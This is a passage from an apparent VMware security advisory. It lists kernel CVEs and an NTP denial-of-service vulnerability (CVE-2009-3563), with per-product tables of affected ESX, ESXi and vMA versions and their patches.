CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1 The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.0 ESX ESX400-201005401-SG ESX3.5 ESX not applicable ESX3.0.3 ESX not applicable ESX2.5.5 ESX not applicable vMA4.0 RHEL5affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. b. ESXi userworld update for ntp The Network Time Protocol (NTP) is used to synchronize the time of a computer client or server to another server or reference time source. A vulnerability in ntpd could allow a remote attacker to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons. The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3563 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi 4.0 ESXi ESXi400-201005401-SG ESXi 3.5 ESXi affected, patch pending ESXany ESX not applicable vMAany RHEL5not applicable * hosted products are VMware Workstation, Player, ACE, Server, Fusion. c. Service